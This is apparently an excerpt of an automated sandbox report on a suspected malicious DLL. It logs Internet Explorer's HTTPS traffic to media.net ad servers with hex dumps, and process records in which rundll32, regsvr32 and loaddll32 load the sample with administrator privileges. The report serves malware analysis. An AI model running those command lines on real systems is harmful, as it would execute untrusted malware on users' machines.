                                                                                                                                                                                                                  2021-12-02 23:42:51 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 204
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Cache-Control: max-age=657589
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:51 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:51 UTC809INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79
                                                                                                                                                                                                                  Data Ascii: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  4192.168.2.64979023.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:51 UTC808OUTGET /rtbsmpubs.php?&gdpr=0&gdprconsent=1&usp_enf=1&usp_status=0&cid=8HBI57XIG&region=nv&ptrid=8PR68Q253&requestString=670468743*4%7C300x250%7C8CU157172%7C858412214%7C&crid=670468743&sd=1&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&bl=1&rt=5&dn=https://contextual.media.net&https=1&act=headerBid&prvReqId=655139198087331261638520979902&erTr=0&hlt=1&ugd=4&adt=desktop&tr=0.17810036448631755&ndec=1&scrsize=1280x1024&taginfo=%7B%7D&pageinfo=%7B%22vw%22%3A284%2C%22vh%22%3A271%2C%22ph%22%3A271%7D&itype=HB-CM&cc=CH&rc=ZH&ct=ZURICH&bt=1&gcp=1&isRefresh=0&callback=window.hbCMBidxc.rtbsheaderBid3S0 HTTP/1.1
                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=1%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:42:51 UTC809INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 4169
                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                  X-MNET-HL2: E
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:42:51 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:51 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:51 UTC809INData Raw: 20
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2021-12-02 23:42:51 UTC809INData Raw: 77 69 6e 64 6f 77 2e 68 62 43 4d 42 69 64 78 63 2e 72 74 62 73 68 65 61 64 65 72 42 69 64 33 53 30 28 7b 22 70 69 6e 66 6f 22 3a 7b 22 34 22 3a 7b 22 61 64 43 6f 64 65 54 79 70 65 22 3a 22 42 41 4e 4e 45 52 22 2c 22 61 64 46 6f 72 6d 61 74 22 3a 22 68 74 6d 6c 22 2c 22 61 65 22 3a 66 61 6c 73 65 7d 7d 2c 22 6d 65 74 61 22 3a 7b 22 61 75 63 74 69 6f 6e 5f 69 64 22 3a 22 37 36 31 31 32 32 33 39 37 36 32 39 39 36 38 35 39 5f 35 33 31 37 35 37 32 39 22 2c 22 72 65 67 69 6f 6e 22 3a 22 6e 79 64 63 22 2c 22 76 63 66 6c 22 3a 66 61 6c 73 65 2c 22 73 65 72 76 65 72 49 64 22 3a 22 63 31 30 2d 6d 6f 77 78 2d 70 72 6f 64 2d 31 22 2c 22 61 70 69 64 22 3a 31 2c 22 70 72 76 52 65 71 49 64 22 3a 22 36 35 35 31 33 39 31 39 38 30 38 37 33 33 31 32 36 31 36 33 38 35 32 30
                                                                                                                                                                                                                  Data Ascii: window.hbCMBidxc.rtbsheaderBid3S0({"pinfo":{"4":{"adCodeType":"BANNER","adFormat":"html","ae":false}},"meta":{"auction_id":"76112239762996859_53175729","region":"nydc","vcfl":false,"serverId":"c10-mowx-prod-1","apid":1,"prvReqId":"655139198087331261638520


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  5192.168.2.64979823.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:57 UTC814OUTGET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=5&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1
                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=2%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:42:57 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 204
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Cache-Control: max-age=657583
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:57 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:57 UTC814INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79
                                                                                                                                                                                                                  Data Ascii: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  6192.168.2.64979923.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:57 UTC815OUTGET /rtbsmpubs.php?&gdpr=0&gdprconsent=1&usp_enf=1&usp_status=0&cid=8HBI57XIG&region=nv&ptrid=8PR68Q253&requestString=976531914*4%7C300x250%7C8CU157172%7C722878611%7C&crid=976531914&sd=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&bl=1&rt=5&dn=https://contextual.media.net&https=1&act=headerBid&prvReqId=695089110086948631638520986847&erTr=0&hlt=1&ugd=4&adt=desktop&tr=0.519716239585557&ndec=1&scrsize=1280x1024&taginfo=%7B%7D&pageinfo=%7B%22vw%22%3A284%2C%22vh%22%3A271%2C%22ph%22%3A271%7D&itype=HB-CM&cc=CH&rc=ZH&ct=ZURICH&bt=1&gcp=1&isRefresh=0&callback=window.hbCMBidxc.rtbsheaderBid3S0 HTTP/1.1
                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=2%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC816INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 4175
                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                  X-MNET-HL2: E
                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:42:57 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:57 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC816INData Raw: 20
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC816INData Raw: 77 69 6e 64 6f 77 2e 68 62 43 4d 42 69 64 78 63 2e 72 74 62 73 68 65 61 64 65 72 42 69 64 33 53 30 28 7b 22 70 69 6e 66 6f 22 3a 7b 22 34 22 3a 7b 22 61 64 43 6f 64 65 54 79 70 65 22 3a 22 42 41 4e 4e 45 52 22 2c 22 61 64 46 6f 72 6d 61 74 22 3a 22 68 74 6d 6c 22 2c 22 61 65 22 3a 66 61 6c 73 65 7d 7d 2c 22 6d 65 74 61 22 3a 7b 22 61 75 63 74 69 6f 6e 5f 69 64 22 3a 22 35 36 35 31 34 31 35 32 36 35 31 34 32 32 35 38 5f 31 30 30 36 37 31 32 37 33 33 22 2c 22 72 65 67 69 6f 6e 22 3a 22 6e 79 64 63 22 2c 22 76 63 66 6c 22 3a 66 61 6c 73 65 2c 22 73 65 72 76 65 72 49 64 22 3a 22 63 31 30 2d 6d 6f 77 78 2d 77 65 62 2d 34 33 22 2c 22 61 70 69 64 22 3a 31 2c 22 70 72 76 52 65 71 49 64 22 3a 22 36 39 35 30 38 39 31 31 30 30 38 36 39 34 38 36 33 31 36 33 38 35 32
                                                                                                                                                                                                                  Data Ascii: window.hbCMBidxc.rtbsheaderBid3S0({"pinfo":{"4":{"adCodeType":"BANNER","adFormat":"html","ae":false}},"meta":{"auction_id":"5651415265142258_1006712733","region":"nydc","vcfl":false,"serverId":"c10-mowx-web-43","apid":1,"prvReqId":"69508911008694863163852


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  7192.168.2.64980223.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC820OUTGET /803288796/fcmain.js?cb=window._mNDetails.initAd&&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1638488555656014322&ugd=4&rtbs=1&nb=1 HTTP/1.1
                                                                                                                                                                                                                  Accept: application/javascript, */*;q=0.8
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=4%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC821INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 39425
                                                                                                                                                                                                                  Content-Type: text/javascript
                                                                                                                                                                                                                  X-MNT-HL2: 8-18
                                                                                                                                                                                                                  X-MNT-W: 21-xj05
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Expires: Thu, 02 Dec 2021 23:42:58 GMT
                                                                                                                                                                                                                  Cache-Control: max-age=0, no-cache, no-store
                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:58 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC821INData Raw: 20 20 20 20
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC821INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3b 77 69 6e 64 6f 77 2e 5f 6d 4e 44 65 74 61 69 6c 73 2e 69 6e 69 74 41 64 28 7b 22 76 69 22 3a 22 31 36 33 38 34 38 38 35 35 35 36 35 36 30 31 34 33 32 32 22 2c 22 73 22 3a 7b 22 5f 6d 4e 4c 32 22 3a 7b 22 73 69 7a 65 22 3a 22 33 30 36 78 32 37 31 22 2c 22 76 69 43 6f 6d 70 22 3a 22 31 36 33 38 34 38 35 33 31 34 32 36 31 32 32 39 37 33 33 22 2c 22 68 69 64 65 41 64 55 6e 69 74 41 42 50 22 3a 74 72 75 65 2c 22 61 62 70 6c 22 3a 22 33 22 2c 22 63 75 73 74 48 74 22 3a 22 22 2c 22 73 65 74 4c 33 31 30 30 22 3a 22 31 22 7d 2c 22 6c 68 70 22 3a 7b 22 6c 32 77 73 69 70 22 3a 22 31 37 30 37 32 31 36 33 31 22 2c 22 6c 32 61 63 22 3a 22 22 2c 22 73 65 74 68 63 73 64 22 3a 22 73 65 74 21 41 31 38 7c 38 30 31 33 22 7d 2c 22
                                                                                                                                                                                                                  Data Ascii: ;window._mNDetails.initAd({"vi":"1638488555656014322","s":{"_mNL2":{"size":"306x271","viComp":"1638485314261229733","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"170721631","l2ac":"","sethcsd":"set!A18|8013"},"
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC837INData Raw: 74 36 63 74 33 37 74 34 34 74 36 62 74 33 32 74 36 36 74 34 63 74 35 33 74 34 39 74 36 38 74 36 38 74 36 33 74 36 31 74 36 33 74 35 37 74 33 30 74 37 37 74 36 35 74 36 61 74 37 30 74 36 64 74 35 35 74 35 35 74 35 33 74 34 35 74 34 35 74 37 30 74 33 37 74 34 38 74 37 36 74 34 62 74 35 32 74 35 31 74 32 35 74 33 33 74 34 34 74 32 35 74 33 33 74 34 34 74 32 35 74 33 37 74 34 33 74 34 65 74 33 37 74 36 36 74 37 35 74 33 32 74 37 36 74 34 62 74 37 34 74 33 38 74 35 66 74 37 33 74 32 35 74 33 33 74 34 34 74 32 35 74 33 37 74 34 33 74 33 32 74 35 36 74 36 66 74 33 31 74 36 33 74 37 33 74 34 62 74 33 30 74 33 36 74 34 35 74 36 63 74 35 31 74 35 36 74 36 64 74 33 39 74 37 37 74 37 34 74 36 34 74 33 37 74 36 62 74 36 64 74 37 39 74 36 38 74 35 35 74 36 34 74 33 38
                                                                                                                                                                                                                  Data Ascii: t6ct37t44t6bt32t66t4ct53t49t68t68t63t61t63t57t30t77t65t6at70t6dt55t55t53t45t45t70t37t48t76t4bt52t51t25t33t44t25t33t44t25t37t43t4et37t66t75t32t76t4bt74t38t5ft73t25t33t44t25t37t43t32t56t6ft31t63t73t4bt30t36t45t6ct51t56t6dt39t77t74t64t37t6bt6dt79t68t55t64t38
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC845INData Raw: 33 30 74 33 39 74 33 38 74 36 33 74 32 65 74 36 61 74 37 30 74 36 37 74 33 66 74 37 36 74 33 64 74 33 39 77 78 77 74 36 34 74 37 34 74 34 39 74 36 34 77 79 74 36 65 74 37 35 74 36 63 74 36 63 78 77 74 36 34 74 37 34 77 79 77 74 34 34 74 36 39 74 36 35 7a 74 36 32 74 36 35 74 37 33 74 37 34 74 36 35 74 36 65 7a 74 34 61 74 36 35 74 36 31 74 36 65 74 37 33 7a 74 36 36 74 35 63 74 37 35 74 33 30 74 33 30 74 36 36 74 36 33 74 37 32 7a 74 34 36 74 37 32 74 36 31 74 37 35 74 36 35 74 36 65 77 78 77 74 36 62 74 36 33 77 79 77 74 35 33 74 36 38 74 36 66 74 37 30 74 37 30 74 36 39 74 36 65 74 36 37 7a 74 33 65 7a 74 34 31 74 37 30 74 37 30 74 36 31 74 37 32 74 36 35 74 36 63 7a 74 33 65 7a 74 35 37 74 36 66 74 36 64 74 36 35 74 36 65 74 32 37 74 37 33 7a 74 34 33
                                                                                                                                                                                                                  Data Ascii: 30t39t38t63t2et6at70t67t3ft76t3dt39wxwt64t74t49t64wyt6et75t6ct6cxwt64t74wywt44t69t65zt62t65t73t74t65t6ezt4at65t61t6et73zt66t5ct75t30t30t66t63t72zt46t72t61t75t65t6ewxwt6bt63wywt53t68t6ft70t70t69t6et67zt3ezt41t70t70t61t72t65t6czt3ezt57t6ft6dt65t6et27t73zt43


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  8192.168.2.64980123.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC859OUTGET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=1053&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1
                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=4%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC860INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 204
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Cache-Control: max-age=657582
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:58 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC860INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79
                                                                                                                                                                                                                  Data Ascii: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                  9192.168.2.64980023.211.6.95443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC860OUTGET /checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C117%2C184%2C188%2C203%2C226%2C246%2C2030%2C2033%2C3018&itype=HB-CM&rtime=7479&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usp HTTP/1.1
                                                                                                                                                                                                                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                                                                  Referer: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                  Host: contextual.media.net
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Cookie: hbcm_sd=4%7C1638520979780
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC861INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Content-Length: 204
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                  Strict-Transport-Security: max-age=604800
                                                                                                                                                                                                                  Cache-Control: max-age=657582
                                                                                                                                                                                                                  Date: Thu, 02 Dec 2021 23:42:58 GMT
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  2021-12-02 23:42:58 UTC861INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79 43 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3a 20 53 51 4c 53 54 41 54 45 5b 48 59 30 30 30 5d 20 5b 32 30 30 36 5d 20 4d 79 53 51 4c 20 73 65 72 76 65 72 20 68 61 73 20 67 6f 6e 65 20 61 77 61 79
                                                                                                                                                                                                                  Data Ascii: Connection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone awayConnection failed: SQLSTATE[HY000] [2006] MySQL server has gone away


                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:25
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:loaddll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll"
                                                                                                                                                                                                                  Imagebase:0xb80000
                                                                                                                                                                                                                  File size:893440 bytes
                                                                                                                                                                                                                  MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:25
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1
                                                                                                                                                                                                                  Imagebase:0x2a0000
                                                                                                                                                                                                                  File size:232960 bytes
                                                                                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:25
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\mATFWhYtPk.dll
                                                                                                                                                                                                                  Imagebase:0xac0000
                                                                                                                                                                                                                  File size:20992 bytes
                                                                                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:25
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:rundll32.exe "C:\Users\user\Desktop\mATFWhYtPk.dll",#1
                                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Start time:00:42:26
                                                                                                                                                                                                                  Start date:03/12/2021
                                                                                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                  Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                  Imagebase:0x7ff721e20000
                                                                                                                                                                                                                  File size:823560 bytes
                                                                                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:high

